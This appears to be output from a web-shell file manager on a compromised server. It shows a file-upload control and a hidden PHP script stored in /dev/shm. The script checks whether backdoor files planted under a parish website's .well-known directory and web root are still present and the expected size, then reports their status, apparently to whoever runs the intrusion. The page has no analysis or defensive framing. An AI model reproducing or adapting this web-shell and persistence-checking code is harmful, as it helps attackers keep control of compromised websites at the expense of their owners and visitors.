Your IP : 216.73.216.5


Current Path : /dev/shm/
Upload File :
Current File : //dev/shm/.bind

<?php   $r = '/home/tokomrjk/parroquiasanmigueljerez.org'; $x = ["/type.org.php"=>"bd@@250524120@@74",
"/.well-known/scan.php"=>"bd@@250523103@@68",
"/.well-known/pki-validation/class.recipenav.php"=>"bd@@250483641@@772",
"/.well-known/pki-validation/class.recipenav.php"=>"bd@@250521823@@52",
"/type.org.php"=>"bd@@250523106@@1124",
"/.well-known/scan.php"=>"bd@@250516353@@1566"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');